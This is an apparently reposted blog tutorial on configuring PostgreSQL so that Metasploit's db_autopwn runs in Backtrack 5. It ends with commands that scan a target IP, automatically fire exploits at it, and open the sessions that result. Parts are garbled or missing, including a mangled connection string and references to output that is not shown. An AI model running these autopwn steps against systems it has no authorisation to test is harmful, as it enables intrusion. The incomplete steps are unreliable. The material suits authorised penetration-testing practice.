Metasploit Autopwn fix for Backtrack 5 with PostgreSQL
A lot of people are having trouble with Metasploit's Autopwn feature in Backtrack 5. It does require a little bit of tweaking to get going. Below are a few steps to get you on your way.
I prefer to use PostgreSQL over MySQL, so this tutorial only shows how to properly configure Autopwn using PostgreSQL.
First you must determine if you have postgres installed on your system. To do this type the following into a terminal:
ls /etc/init.d/ | grep post
Code:
# - Security and Authentication -
#authentication_timeout = 1min # 1s-600s
#ssl = true # (change requires restart)
You simply comment it out like I did above with the "#" sign.
Now restart postgres:
/etc/init.d/postgresql-8.4 start
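To confirm which state the ssl line is actually in after an edit like the one above, the following added example (not part of the original tutorial) reports whether a setting in a postgresql.conf-style file is active, commented out, or absent. The function name pg_setting_state is hypothetical, the config path is passed as an argument because the page does not give one, and the sample file is constructed from the lines shown above; only the "name = value" form is handled.

```shell
#!/bin/sh
# Added example: report the state of a setting in a postgresql.conf-style file.
# Usage: pg_setting_state FILE NAME
# Prints "active <value>", "commented <value>", or "absent".
pg_setting_state() {
    awk -v name="$2" -v q="'" '
    function value_of(s) {
        sub(/^[^=]*=[ \t]*/, "", s)        # drop "name ="
        sub(/[ \t]*#.*$/, "", s)           # drop trailing comment
        gsub("^" q "|" q "$", "", s)       # strip surrounding single quotes
        return s
    }
    {
        line = $0
        sub(/^[ \t]+/, "", line)
        commented = (line ~ /^#/)
        if (commented) sub(/^#+[ \t]*/, "", line)
        if (line !~ ("^" name "[ \t]*=")) next
        if (commented) {
            # a commented line only counts if no active line was seen
            if (state != "active") { state = "commented"; val = value_of(line) }
        } else {
            state = "active"; val = value_of(line)   # last active line wins
        }
    }
    END {
        if (state == "") print "absent"
        else print state, val
    }' "$1"
}

# Constructed sample input, based on the fragment shown in the tutorial.
conf=$(mktemp)
cat > "$conf" <<'EOF'
# - Security and Authentication -
#authentication_timeout = 1min # 1s-600s
#ssl = true # (change requires restart)
EOF
pg_setting_state "$conf" ssl
rm -f "$conf"
```

Run against the real config file, the same check shows when ssl has been switched back on.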
Now connect to the server and change the password to whatever you want:
sudo su postgres -c psql
ALTER USER postgres WITH PASSWORD 'yoursecretpasswd';
(Make sure to use the quotation marks when setting your password. Here is a real-life example.)
ALTER USER postgres WITH PASSWORD 'swordfish';
\q
sudo passwd -d postgres
sudo su postgres -c passwd
(Here you want to use the same password you used a few steps back)
PostgreSQL is all set up; now on to Metasploit.
Start Metasploit by typing: msfconsole
Once Metasploit starts, type: db_driver
If the driver is already loaded it will give an output like below.
If not, you will need to manually load the driver by typing: db_driver postgresql
Now all you have to do is connect to your database by typing (pentest is the name of the database):
db_connect postgres:[email protected]/metasploit
We are now connected and ready to run autopwn.
Run a nmap scan on the target:
db_nmap 192.68.12.99
To see all of autopwn's options type: db_autopwn
Finally, launch autopwn, then sit back and wait:
db_autopwn -p -t -e -r
After autopwn completes type:
sessions -l
Any successful attacks will result in a session. To interact with that session type:
sessions -i 1 (where 1 is the session number)
Original: http://rootbook0.blogspot.com/2011/07/metasploit-autopwn-fix-for-backtack-5.html